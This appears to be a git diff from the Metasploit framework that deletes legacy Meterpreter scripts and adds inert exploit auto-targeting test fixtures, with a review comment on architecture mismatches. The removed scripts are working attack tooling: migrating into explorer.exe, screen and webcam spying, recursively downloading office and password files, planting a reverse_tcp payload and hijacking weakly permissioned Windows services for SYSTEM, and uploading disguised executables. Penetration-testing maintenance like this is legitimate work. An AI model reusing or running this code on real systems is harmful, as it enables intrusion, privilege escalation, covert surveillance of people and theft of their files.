-# Author:Roni Bachar (@roni_bachar) roni.bachar.blog@gmail.com
-#
-# Thie script will open an interactive view of remote hosts
-# You will need firefox installed on your machine
-
-
-require 'fileutils'
-
-opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu." ],
- "-d" => [ true, "The Delay in seconds between each screenshot." ],
- "-t" => [ true, "The time to run in sec." ],
- "-s" => [ true, "The local system linux/windows" ]
-)
-
-freq = 3
-count = 10
-file = "screenshot.jpeg"
-meter_type = client.platform
-localsys = "linux"
-
-opts.parse(args) { |opt, idx, val|
- case opt
- when '-d'
- freq = val.to_i
- when '-t'
- count = val.to_i
- when '-s'
- localsys = val.to_s
-
- when "-h"
- print_line
- print_line "Screenspy v1.0"
- print_line "--------------"
- print_line
- print_line
- print_line "Usage: bgrun screenspy -t 20 -d 1 => will take interactive Screenshot every sec for 20 sec long."
- print_line "Usage: bgrun screenspy -t 60 -d 5 => will take interactive Screenshot every 5 sec for 1 min long."
- print_line "Usage: bgrun screenspy -s windows -d 1 -t 60 => will take interactive Screenshot every 1 sec for 1 min long, windows local mode."
- print_line
- print_line "Author:Roni Bachar (@roni_bachar) roni.bachar.blog@gmail.com"
- print_line(opts.usage)
- raise Rex::Script::Completed
- end
-}
-
-# Wrong Meterpreter Version Message Function
-#-------------------------------------------------------------------------------
-def wrong_meter_version(meter = meter_type)
- print_error("#{meter} version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
-
-# Check for Version of Meterpreter
-wrong_meter_version(meter_type) if meter_type !~ /win32|win64/i
-session = client
-
-
-
-host,port = session.session_host, session.session_port
-
-print_status("New session on #{host}:#{port}...")
-
-logs = ::File.join(Msf::Config.install_root, 'logs', 'screenshot', host)
-
-outfile = ::File.join(Msf::Config.log_directory,file)
-
-::FileUtils.mkdir_p(logs)
-
-
-begin
- process2mig = "explorer.exe"
-
- # Actual migration
- mypid = session.sys.process.getpid
- session.sys.process.get_processes().each do |x|
- if (process2mig.index(x['name'].downcase) and x['pid'] != mypid)
- print_status("#{process2mig} Process found, migrating into #{x['pid']}")
- session.core.migrate(x['pid'].to_i)
- print_status("Migration Successful!!")
- end
- end
-rescue
- print_status("Failed to migrate process!")
- #next
-end
-
-
-begin
- session.core.use("espia")
-
-
- begin
-
- data="#{host}"
- path1 = File.join(logs,"video.html")
- File.open(path1, 'w') do |f2|
- f2.puts(data)
- end
-
-
- if (localsys == "windows")
-
- print_status("Runing in local mode => windows")
- print_status("Opening Interactive view...")
- localcmd="start firefox -width 530 -height 660 \"file:///#{Msf::Config.install_root}/logs/screenshot/#{host}/video.html\""
- else
- print_status("Runing in local mode => Linux")
- print_status("Opening Interactive view...")
- localcmd="bash firefox -width 530 -height 660 \"file:///#{Msf::Config.install_root}/logs/screenshot/#{host}/video.html\""
- end
-
- system (localcmd)
- (1..count).each do |i|
- sleep(freq) if(i != 1)
- path = File.join(logs,"screenshot.jpeg")
- data = session.espia.espia_image_get_dev_screen
-
- if(data)
- ::File.open(path, 'wb') do |fd|
- fd.write(data)
- fd.close()
- end
- end
- end
-
- rescue ::Exception => e
- print_status("Interactive Screenshot Failed: #{e.class} #{e} #{e.backtrace}")
- end
-
- print_status("The interactive Session ended...")
- data = <<-EOS
-#{host} - Interactive Session ended
-
-
-EOS
- File.open(path1, 'w') do |f2|
- f2.puts(data)
- end
-
-rescue ::Exception => e
- print_status("Exception: #{e.class} #{e} #{e.backtrace}")
-end
-
-
-
-
-
-
-
diff --git a/scripts/meterpreter/search_dwld.rb b/scripts/meterpreter/search_dwld.rb
deleted file mode 100644
index 1c5148bfc4..0000000000
--- a/scripts/meterpreter/search_dwld.rb
+++ /dev/null
@@ -1,107 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-## Meterpreter script that recursively search and download
-## files matching a given pattern
-## Provided by Nicob
-
-## == WARNING ==
-## As said by mmiller, this kind of script is slow and noisy :
-## http://www.metasploit.com/archive/framework/msg01670.html
-## However, it can sometimes save your ass ;-)
-## == WARNING ==
-
-# Filters
-$filters = {
- 'office' => '\.(doc|docx|ppt|pptx|pps|xls|xlsx|mdb|od.)$',
- 'win9x' => '\.pwl$',
- 'passwd' => '(pass|pwd)',
-}
-
-@@opts = Rex::Parser::Arguments.new(
- "-h" => [ false,"Help menu." ]
-)
-
-def usage
- print_line "search_dwld -- recursively search for and download files matching a given pattern"
- print_line "USAGE: run search_dwld [base directory] [filter] [pattern]"
- print_line
- print_line "filter can be a defined pattern or 'free', in which case pattern must be given"
- print_line "Defined patterns:"
- print_line $filters.keys.sort.collect{|k| "\t#{k}"}.join("\n")
- print_line
- print_line "Examples:"
- print_line " run search_dwld"
- print_line " => recursively look for (MS|Open)Office in C:\\"
- print_line " run search_dwld %USERPROFILE% win9x"
- print_line " => recursively look for *.PWL files in the user home directory"
- print_line " run search_dwld E:\\\\ free '\.(jpg|png|gif)$'"
- print_line " => recursively look for pictures in the E: drive"
- print_line(@@opts.usage)
- raise Rex::Script::Completed
-end
-
-@@opts.parse(args) { |opt, idx, val|
- case opt
- when "-h"
- usage
- end
-}
-
-def scan(path)
- begin
- dirs = client.fs.dir.foreach(path)
- rescue ::Rex::Post::Meterpreter::RequestError => e
- print_error("Error scanning #{path}: #{$!}")
- return
- end
-
- dirs.each {|x|
- next if x =~ /^(\.|\.\.)$/
- fullpath = path + '\\' + x
-
- if client.fs.file.stat(fullpath).directory?
- scan(fullpath)
- elsif fullpath =~ /#{$motif}/i
- # Replace ':' or '%' or '\' by '_'
- dst = fullpath.tr_s(":|\%|\\", "_")
- dst = Rex::FileUtils.clean_path(::Dir.tmpdir + ::File::Separator + dst)
- print_line("Downloading '#{fullpath}' to '#{dst}'")
- client.fs.file.download_file(dst, fullpath)
- end
- }
-end
-
-#check for proper Meterpreter Platform
-def unsupported
- print_error("This version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
-
-
-unsupported if client.platform !~ /win32|win64/i
-# Get arguments
-basedir = args[0] || "C:\\"
-filter = args[1] || "office"
-
-# Set the regexp
-if filter == 'free'
- if args[2].nil?
- raise RuntimeError.new("free filter requires pattern argument")
- end
- $motif = args[2]
-else
- $motif = $filters[filter]
-end
-
-if $motif.nil?
- raise RuntimeError.new("Unrecognized filter")
-end
-
-# Search and download
-scan(basedir)
-
diff --git a/scripts/meterpreter/service_permissions_escalate.rb b/scripts/meterpreter/service_permissions_escalate.rb
deleted file mode 100644
index 01d2f2b348..0000000000
--- a/scripts/meterpreter/service_permissions_escalate.rb
+++ /dev/null
@@ -1,210 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-##
-# Many services are configured with insecure permissions. This
-# script attempts to create a service, then searches through a list of
-# existing services to look for insecure file or configuration
-# permissions that will let it replace the executable with a payload.
-# It will then attempt to restart the replaced service to run the
-# payload. If that fails, the next time the service is started (such as
-# on reboot) the attacker will gain elevated privileges.
-#
-# scriptjunkie googlemail com
-#
-##
-
-if client.platform !~ /win32/
- print_error("This version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
-#
-# Options
-#
-opts = Rex::Parser::Arguments.new(
- "-a" => [ false, "Aggressive mode - exploit as many services as possible (can be dangerous!)"],
- "-h" => [ false, "This help menu"],
- "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
- "-p" => [ true, "The port on the remote host where Metasploit is listening"]
-)
-
-#
-# Default parameters
-#
-
-rhost = Rex::Socket.source_address("1.2.3.4")
-rport = 4444
-aggressive = false
-
-#
-# Option parsing
-#
-opts.parse(args) do |opt, idx, val|
- case opt
- when "-a"
- aggressive = true
- when "-h"
- print_status("Generic weak service permissions privilege escalation.")
- print_line(opts.usage)
- raise Rex::Script::Completed
- when "-r"
- rhost = val
- when "-p"
- rport = val.to_i
- end
-end
-
-envs = client.sys.config.getenvs('TEMP', 'SYSTEMROOT')
-tempdir = envs['TEMP']
-sysdir = envs['SYSTEMROOT']
-
-# Get the exe payload.
-pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
-pay.datastore['LHOST'] = rhost
-pay.datastore['LPORT'] = rport
-raw = pay.generate
-exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
-#and placing it on the target in %TEMP%
-tempexename = Rex::Text.rand_text_alpha((rand(8)+6))
-tempexe = "#{tempdir}\\#{tempexename}.exe"
-print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{tempexe}")
-fd = client.fs.file.new(tempexe, "wb")
-fd.write(exe)
-fd.close
-
-#get handler to be ready
-handler = client.framework.exploits.create("multi/handler")
-handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
-handler.datastore['LHOST'] = rhost
-handler.datastore['LPORT'] = rport
-handler.datastore['InitialAutoRunScript'] = "migrate -f"
-handler.datastore['ExitOnSession'] = false
-#start a handler to be ready
-handler.exploit_simple(
- 'Payload' => handler.datastore['PAYLOAD'],
- 'RunAsJob' => true
-)
-
-#attempt to make new service
-client.railgun.kernel32.LoadLibraryA("advapi32.dll")
-client.railgun.get_dll('advapi32')
-client.railgun.add_function( 'advapi32', 'DeleteService','BOOL',[
- [ "DWORD", "hService", "in" ]
-])
-
-#SERVICE_NO_CHANGE 0xffffffff for DWORDS or NULL for pointer values leaves the current config
-
-print_status("Trying to add a new service...")
-adv = client.railgun.advapi32
-manag = adv.OpenSCManagerA(nil,nil,0x10013)
-if(manag["return"] != 0)
- # SC_MANAGER_CREATE_SERVICE = 0x0002
- newservice = adv.CreateServiceA(manag["return"],"walservice","Windows Application Layer",0x0010,0X00000010,2,0,tempexe,nil,nil,nil,nil,nil)
- #SERVICE_START=0x0010 SERVICE_WIN32_OWN_PROCESS= 0X00000010
- #SERVICE_AUTO_START = 2 SERVICE_ERROR_IGNORE = 0
- if(newservice["return"] != 0)
- print_status("Created service... #{newservice["return"]}")
- ret = adv.StartServiceA(newservice["return"], 0, nil)
- print_status("Service should be started! Enjoy your new SYSTEM meterpreter session.")
- service_delete("walservice")
- adv.CloseServiceHandle(newservice["return"])
- if aggressive == false
- adv.CloseServiceHandle(manag["return"])
- raise Rex::Script::Completed
- end
- else
- print_status("Uhoh. service creation failed, but we should have the permissions. :-(")
- end
-else
- print_status("No privs to create a service...")
- manag = adv.OpenSCManagerA(nil,nil,1)
- if(manag["return"] == 0)
- print_status("Cannot open sc manager. You must have no privs at all. Ridiculous.")
- end
-end
-print_status("Trying to find weak permissions in existing services..")
-#Search through list of services to find weak permissions, whether file or config
-serviceskey = "HKLM\\SYSTEM\\CurrentControlSet\\Services"
-#for each service
-service_list.each do |serv|
- begin
- srvtype = registry_getvaldata("#{serviceskey}\\#{serv}","Type").to_s
- if srvtype != "16"
- continue
- end
- moved = false
- configed = false
- #default path, but there should be an ImagePath registry key
- source = "#{sysdir}\\system32\\#{serv}.exe"
- #get path to exe; parse out quotes and arguments
- sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
- sourcemaybe = client.fs.file.expand_path(sourceorig)
- if( sourcemaybe[0] == '"' )
- sourcemaybe = sourcemaybe.split('"')[1]
- else
- sourcemaybe = sourcemaybe.split(' ')[0]
- end
- begin
- client.fs.file.stat(sourcemaybe) #check if it really exists
- source = sourcemaybe
- rescue
- print_status("Cannot reliably determine path for #{serv} executable. Trying #{source}")
- end
- #try to exploit weak file permissions
- if(source != tempexe && client.railgun.kernel32.MoveFileA(source, source+'.bak')["return"])
- client.railgun.kernel32.CopyFileA(tempexe, source, false)
- print_status("#{serv} has weak file permissions - #{source} moved to #{source + '.bak'} and replaced.")
- moved = true
- end
- #try to exploit weak config permissions
- #open with SERVICE_CHANGE_CONFIG (0x0002)
- servhandleret = adv.OpenServiceA(manag["return"],serv,2)
- if(servhandleret["return"] != 0)
- #SERVICE_NO_CHANGE is 0xFFFFFFFF
- if(adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,0xFFFFFFFF,0xFFFFFFFF,tempexe,nil,nil,nil,nil,nil,nil))
- print_status("#{serv} has weak configuration permissions - reconfigured to use exe #{tempexe}.")
- configed = true
- end
- adv.CloseServiceHandle(servhandleret["return"])
-
- end
- if(moved != true && configed != true)
- print_status("No exploitable weak permissions found on #{serv}")
- continue
- end
- print_status("Restarting #{serv}")
- #open with SERVICE_START (0x0010) and SERVICE_STOP (0x0020)
- servhandleret = adv.OpenServiceA(manag["return"],serv,0x30)
- if(servhandleret["return"] != 0)
- #SERVICE_CONTROL_STOP = 0x00000001
- if(adv.ControlService(servhandleret["return"],1,56))
- client.railgun.kernel32.Sleep(1000)
- adv.StartServiceA(servhandleret["return"],0,nil)
- print_status("#{serv} restarted. You should get a system meterpreter soon. Enjoy.")
- #Cleanup
- if moved == true
- client.railgun.kernel32.MoveFileExA(source+'.bak', source, 1)
- end
- if configed == true
- servhandleret = adv.OpenServiceA(manag["return"],serv,2)
- adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,0xFFFFFFFF,0xFFFFFFFF,sourceorig,nil,nil,nil,nil,nil,nil)
- adv.CloseServiceHandle(servhandleret["return"])
- end
- if aggressive == false
- raise Rex::Script::Completed
- end
- else
- print_status("Could not restart #{serv}. Wait for a reboot. (or force one yourself)")
- end
- adv.CloseServiceHandle(servhandleret["return"])
- else
- print_status("Could not restart #{serv}. Wait for a reboot. (or force one yourself)")
- end
- rescue
- end
-end
-
diff --git a/scripts/meterpreter/uploadexec.rb b/scripts/meterpreter/uploadexec.rb
deleted file mode 100644
index 4eefc6dd4b..0000000000
--- a/scripts/meterpreter/uploadexec.rb
+++ /dev/null
@@ -1,149 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-session = client
-@@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false,"Help menu." ],
- "-e" => [ true, "Executable or script to upload to target host." ],
- "-o" => [ true, "Options for executable." ],
- "-p" => [ false,"Path on target to upload executable, default is %TEMP%." ],
- "-x" => [ false,"Exit the session once the payload has been run." ],
- "-s" => [ true,"Sleep for a number of seconds after uploading before executing." ],
- "-v" => [ false,"Verbose, return output of execution of uploaded executable." ],
- "-r" => [ false,"Remove the executable after running it (only works if the executable exits right away)" ]
-)
-
-################## function declaration Declarations ##################
-def usage()
- print_line "UploadExec -- upload a script or executable and run it"
- print_line(@@exec_opts.usage)
- raise Rex::Script::Completed
-end
-
-def upload(session,file,trgloc = "")
- if not ::File.exist?(file)
- raise "File to Upload does not exists!"
- else
- if trgloc == ""
- location = session.sys.config.getenv('TEMP')
- else
- location = trgloc
- end
- begin
- ext = file[file.rindex(".") .. -1]
- if ext and ext.downcase == ".exe"
- fileontrgt = "#{location}\\svhost#{rand(100)}.exe"
- else
- fileontrgt = "#{location}\\TMP#{rand(100)}#{ext}"
- end
- print_status("\tUploading #{file}....")
- session.fs.file.upload_file("#{fileontrgt}","#{file}")
- print_status("\t#{file} uploaded!")
- print_status("\tUploaded as #{fileontrgt}")
- rescue ::Exception => e
- print_status("Error uploading file #{file}: #{e.class} #{e}")
- raise e
- end
- end
- return fileontrgt
-end
-
-#Function for executing a list of commands
-def cmd_on_trgt_exec(session,cmdexe,opt,verbose)
- r=''
- session.response_timeout=120
- if verbose == 1
- begin
- print_status "\tRunning command #{cmdexe}"
- r = session.sys.process.execute(cmdexe, opt, {'Hidden' => true, 'Channelized' => true})
- while(d = r.channel.read)
- print_status("\t#{d}")
- end
- r.channel.close
- r.close
- rescue ::Exception => e
- print_status("Error Running Command #{cmdexe}: #{e.class} #{e}")
- raise e
- end
- else
- begin
- print_status "\trunning command #{cmdexe}"
- r = session.sys.process.execute(cmdexe, opt, {'Hidden' => true, 'Channelized' => false})
- r.close
- rescue ::Exception => e
- print_status("Error Running Command #{cmdexe}: #{e.class} #{e}")
- raise e
- end
- end
-end
-
-def m_unlink(session, path)
- r = session.sys.process.execute("cmd.exe /c del /F /S /Q " + path, nil, {'Hidden' => 'true'})
- while(r.name)
- select(nil, nil, nil, 0.10)
- end
- r.close
-end
-#check for proper Meterpreter Platform
-def unsupported
- print_error("This version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
-unsupported if client.platform !~ /win32|win64/i
-#parsing of Options
-file = ""
-cmdopt = nil
-helpcall = 0
-path = ""
-verbose = 0
-remove = 0
-quit = 0
-sleep_sec = nil
-@@exec_opts.parse(args) { |opt, idx, val|
- case opt
- when "-e"
- file = val || ""
- when "-o"
- cmdopt = val
- when "-p"
- path = val
- when "-v"
- verbose = 1
- when "-h"
- helpcall = 1
- when "-s"
- sleep_sec = val.to_f
- when "-r"
- remove = 1
- when "-x"
- quit = 1
- end
-
-}
-
-if args.length == 0 || helpcall == 1
- usage
-end
-print_status("Running Upload and Execute Meterpreter script....")
-exec = upload(session,file,path)
-if sleep_sec
- print_status("\tSleeping for #{sleep_sec}s...")
- Rex.sleep(sleep_sec)
-end
-cmd_on_trgt_exec(session,exec,cmdopt,verbose)
-if remove == 1
- print_status("\tDeleting #{exec}")
- m_unlink(session, exec)
-end
-
-if quit == 1
- print_status("Closing the session...")
- session.core.shutdown rescue nil
- session.shutdown_passive_dispatcher
-end
-
-print_status("Finished!")
diff --git a/scripts/meterpreter/webcam.rb b/scripts/meterpreter/webcam.rb
deleted file mode 100644
index e52da0a992..0000000000
--- a/scripts/meterpreter/webcam.rb
+++ /dev/null
@@ -1,141 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-# Author: scriptjunkie
-#
-# Simplify running webcam, whether grabbing a single frame or running
-# a continous loop.
-
-@client = client
-opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu" ],
- "-f" => [ false, "Just grab single frame"],
- "-l" => [ false, "Keep capturing in a loop (default)" ],
- "-d" => [ true, "Loop delay interval (in ms, default 1000)" ],
- "-i" => [ true, "The index of the webcam to use (Default: 1)" ],
- "-q" => [ true, "The JPEG image quality (Default: 50)" ],
- "-g" => [ false, "Send to GUI instead of writing to file" ],
- "-s" => [ true, "Stop recording" ],
- "-p" => [ true, "The path to the folder images will be saved in (Default: current working directory)" ],
- "-a" => [ false, "Store copies of all the images capture instead of overwriting the same file (Default: overwrite single file)" ]
-)
-iterator = 0
-folderpath = "."
-single = false
-quality = 50
-index = 1
-interval = 1000
-gui = false
-saveAll = false
-opts.parse(args) { |opt, idx, val|
- case opt
- when "-h"
- print_line "webcam -- view webcam over session"
- print_line(opts.usage)
- raise Rex::Script::Completed
- when "-f"
- single = true
- when "-l"
- single = false
- when "-d"
- interval = val.to_i
- when "-i"
- index = val.to_i
- when "-q"
- quality = val.to_i
- when "-g"
- gui = true
- when "-p"
- folderpath = val
- when "-s"
- print_line("[*] Stopping webcam")
- client.webcam.webcam_stop
- raise Rex::Script::Completed
- when "-a"
- saveAll = true
- end
-}
-
-if !(client.platform =~ /win32|win64/)
- print_error("This version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
-begin
- camlist = client.webcam.webcam_list
- if camlist.length == 0
- print_error("Error: no webcams found!")
- raise Rex::Script::Completed
- elsif camlist.length < index
- print_error("Error: only #{camlist.length} webcams found!")
- raise Rex::Script::Completed
- end
- print_line("[*] Starting webcam #{index}: #{camlist[index - 1]}")
- client.webcam.webcam_start(index)
-
- #prepare output
- if(gui)
- sock = Rex::Socket::Udp.create(
- 'PeerHost' => "127.0.0.1",
- 'PeerPort' => 16235
- )
- end
- imagepath = folderpath + ::File::SEPARATOR + "webcam-" + iterator.to_s.rjust(5, "0") + ".jpg"
- print_line( "[*] imagepath is #{imagepath}" )
- htmlpath = folderpath + ::File::SEPARATOR + "webcam.htm"
- begin
- if single == true
- data = client.webcam.webcam_get_frame(quality)
- if(gui)
- sock.write(data)
- else
- ::File.open( imagepath, 'wb' ) do |fd|
- fd.write( data )
- end
- path = ::File.expand_path( imagepath )
- print_line( "[*] Image saved to : #{path}" )
- Rex::Compat.open_file( path )
- end
- else
- if(!gui)
- ::File.open(htmlpath, 'wb' ) do |fd|
- htmlOut = ""
- fd.write(htmlOut)
- end
- print_line( "[*] View live stream at: #{htmlpath}" )
- Rex::Compat.open_file(htmlpath)
- print_line( "[*] Image saved to : #{imagepath}" )
- end
- while true do
- data = client.webcam.webcam_get_frame(quality)
- if(gui)
- sock.write(data)
- else
- ::File.open( imagepath, 'wb' ) do |fd|
- fd.write( data )
- ::File.open(htmlpath, 'wb' ) do |fd|
- htmlOut = ""
- fd.write(htmlOut)
- if(saveAll)
- iterator = iterator + 1
- imagepath = folderpath + ::File::SEPARATOR + "webcam-" + iterator.to_s.rjust(5, "0") + ".jpg"
- end
- end
- end
- end
- select(nil, nil, nil, interval/1000.0)
- end
- end
- rescue ::Interrupt
- rescue ::Exception => e
- print_error("Error getting frame: #{e.class} #{e} #{e.backtrace}")
- end
- print_line("[*] Stopping webcam")
- client.webcam.webcam_stop
- sock.close if sock != nil
-rescue ::Exception => e
- print_error("Error: #{e.class} #{e} #{e.backtrace}")
-end
diff --git a/scripts/meterpreter/wmic.rb b/scripts/meterpreter/wmic.rb
deleted file mode 100644
index a2ae3d1b9d..0000000000
--- a/scripts/meterpreter/wmic.rb
+++ /dev/null
@@ -1,137 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-#Meterpreter script for running WMIC commands on Windows 2003, Windows Vista
-# and Windows XP and Windows 2008 targets.
-#Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
-################## Variable Declarations ##################
-session = client
-wininfo = client.sys.config.sysinfo
-# Setting Arguments
-@@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false,"Help menu." ],
- "-c" => [ true,"Command to execute. The command must be enclosed in double quotes."],
- "-f" => [ true,"File where to saved output of command."],
- "-s" => [ true,"Text file with list of commands, one per line."]
-)
-#Setting Argument variables
-commands = []
-script = []
-outfile = nil
-
-################## Function Declarations ##################
-# Function for running a list of WMIC commands stored in a array, returs string
-def wmicexec(session,wmiccmds= nil)
- tmpout = ''
- session.response_timeout=120
- begin
- tmp = session.sys.config.getenv('TEMP')
- wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000))
- wmiccmds.each do |wmi|
- print_status "running command wmic #{wmi}"
- print_line wmicfl
- r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmicfl} #{wmi}", nil, {'Hidden' => true})
- sleep(2)
- #Making sure that wmic finishes before executing next wmic command
- prog2check = "wmic.exe"
- found = 0
- while found == 0
- session.sys.process.get_processes().each do |x|
- found =1
- if prog2check == (x['name'].downcase)
- sleep(0.5)
- found = 0
- end
- end
- end
- r.close
- end
- # Read the output file of the wmic commands
- wmioutfile = session.fs.file.new(wmicfl, "rb")
- until wmioutfile.eof?
- tmpout << wmioutfile.read
- end
- wmioutfile.close
- rescue ::Exception => e
- print_status("Error running WMIC commands: #{e.class} #{e}")
- end
- # We delete the file with the wmic command output.
- c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
- c.close
- tmpout
-end
-# Function for writing results of other functions to a file
-def filewrt(file2wrt, data2wrt)
- output = ::File.open(file2wrt, "a")
- data2wrt.each_line do |d|
- output.puts(d)
- end
- output.close
-end
-
-#check for proper Meterpreter Platform
-def unsupported
- print_error("This version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
-
-
-def usage
- print_line("Windows WMIC Command Execution Meterpreter Script ")
- print_line @@exec_opts.usage
- print_line("USAGE:")
- print_line("run wmic -c \"WMIC Command Argument\"\n")
- print_line("NOTE:")
- print_line("Not all arguments for WMIC can be used, the /append: option is used by the script")
- print_line("for output retrieval. Arguments must be encased in double quotes and special characters escaped\n")
- print_line("Example:")
- print_line("run wmic -c \"useraccount where (name = \\\'Administrator\\\') get name, sid\"\n")
- raise Rex::Script::Completed
-end
-
-################## Main ##################
-@@exec_opts.parse(args) { |opt, idx, val|
- case opt
- when "-c"
-
- commands.concat(val.split("/"))
-
- when "-s"
-
- script = val
- if not ::File.exist?(script)
- raise "Command List File does not exists!"
- else
- ::File.open(script, "r").each_line do |line|
- next if line.strip.length < 1
- next if line[0,1] == "#"
- commands << line.chomp
- end
- end
- when "-f"
-
- outfile = val
- when "-h"
- usage
- else
- print_error "Unknown option: #{opt}"
- usage
- end
-
-}
-
-if args.length == 0
- usage
-end
-unsupported if client.platform !~ /win32|win64/i
-
-if outfile == nil
- print_status wmicexec(session,commands)
-else
- print_status("Saving output of WMIC to #{outfile}")
- filewrt(outfile, wmicexec(session,commands))
-end
diff --git a/spec/file_fixtures/modules/exploits/auto_target_linux.rb b/spec/file_fixtures/modules/exploits/auto_target_linux.rb
new file mode 100644
index 0000000000..8d3c4efed6
--- /dev/null
+++ b/spec/file_fixtures/modules/exploits/auto_target_linux.rb
@@ -0,0 +1,144 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ include Exploit::Remote::Tcp
+ Rank = ManualRanking
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Exploit Auto-Targeting for Linux',
+ 'Description' => %q{ This module is a test bed for automatic targeting for Linux exploits. },
+ 'Author' => [ 'thelightcosine' ],
+ 'License' => MSF_LICENSE,
+ 'Privileged' => true,
+ 'DefaultOptions' =>
+ {
+ 'WfsDelay' => 10,
+ 'EXITFUNC' => 'thread'
+ },
+ 'Payload' =>
+ {
+ 'Space' => 3072,
+ 'DisableNops' => true
+ },
+ 'Platform' => 'linux',
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Targets' =>
+ [
+ ['Linux Heap Brute Force (Debian/Ubuntu)',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => [ ARCH_X86 ],
+ 'Nops' => 64*1024,
+ 'Bruteforce' =>
+ {
+ 'Start' => { 'Ret' => 0x08352000 },
+ 'Stop' => { 'Ret' => 0x0843d000 },
+ 'Step' => 60*1024,
+
+ }
+ }
+ ],
+
+ ['Linux Heap Brute Force (Gentoo)',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => [ ARCH_X86 ],
+ 'Nops' => 64*1024,
+ 'Bruteforce' =>
+ {
+ 'Start' => { 'Ret' => 0x80310000 },
+ 'Stop' => { 'Ret' => 0x8042f000 },
+ 'Step' => 60*1024,
+
+ }
+ }
+ ],
+
+
+
+ ['Linux Heap Brute Force (Mandriva)',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => [ ARCH_X86 ],
+ 'Nops' => 64*1024,
+ 'Bruteforce' =>
+ {
+ 'Start' => { 'Ret' => 0x80380000 },
+ 'Stop' => { 'Ret' => 0x8045b000 },
+ 'Step' => 60*1024,
+
+ }
+ }
+ ],
+
+ ['Linux Heap Brute Force (RHEL/CentOS)',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => [ ARCH_X86 ],
+ 'Nops' => 64*1024,
+ 'Bruteforce' =>
+ {
+ 'Start' => { 'Ret' => 0xb800f000 },
+ 'Stop' => { 'Ret' => 0xb80c9000 },
+ 'Step' => 60*1024,
+
+ }
+ }
+ ],
+
+ ['Linux Heap Brute Force (SUSE)',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => [ ARCH_X86 ],
+ 'Nops' => 64*1024,
+ 'Bruteforce' =>
+ {
+ 'Start' => { 'Ret' => 0x80365000 },
+ 'Stop' => { 'Ret' => 0x80424000 },
+ 'Step' => 60*1024,
+
+ }
+ }
+ ],
+
+ ['Linux Heap Brute Force (Slackware)',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => [ ARCH_X86 ],
+ 'Nops' => 64*1024,
+ 'Bruteforce' =>
+ {
+ 'Start' => { 'Ret' => 0x8033c000 },
+ 'Stop' => { 'Ret' => 0x80412000 },
+ 'Step' => 60*1024,
+
+ }
+ }
+ ],
+
+ ['Linux Heap Brute Force (OpenWRT MIPS)',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => [ ARCH_MIPSBE ],
+ 'Nops' => 64*1024,
+ 'Bruteforce' =>
+ {
+ 'Start' => { 'Ret' => 0x55900000 },
+ 'Stop' => { 'Ret' => 0x559c0000 },
+ 'Step' => 60*1024,
+ }
+ }
+ ]
+ ],
+ 'DisclosureDate' => 'Jan 01 1999'
+ ))
+ end
+
+ def exploit
+ print_status("This exploit doesn't actually do anything")
+ print_status "Target Selected: #{target.name}"
+ end
+
+
+end
\ No newline at end of file
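Review bot: The module-level `'Arch' => [ARCH_X86, ARCH_X64]` does not match the targets this fixture defines — every target is `ARCH_X86` except the OpenWRT one, which declares `ARCH_MIPSBE`, an architecture the module does not list. If the auto-target code being exercised filters candidate targets against the module's declared arch list, the MIPS target can never be chosen and the x64 entry is dead; if that is intentional it deserves a one-line comment such as `# Arch list deliberately disagrees with targets to exercise filtering`. Separately, each `'Bruteforce'` hash ends with a trailing comma followed by a blank line before `}`, and the file has no newline at end of file; the same layout issues recur in the other three fixtures in this commit (`auto_target_windows.rb`, `existing_auto_target.rb`, `single_target_exploit.rb`).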
diff --git a/spec/file_fixtures/modules/exploits/auto_target_windows.rb b/spec/file_fixtures/modules/exploits/auto_target_windows.rb
new file mode 100644
index 0000000000..ee6d7711ea
--- /dev/null
+++ b/spec/file_fixtures/modules/exploits/auto_target_windows.rb
@@ -0,0 +1,75 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ include Exploit::Remote::Tcp
+ Rank = ManualRanking
+
+ def initialize(info = {})
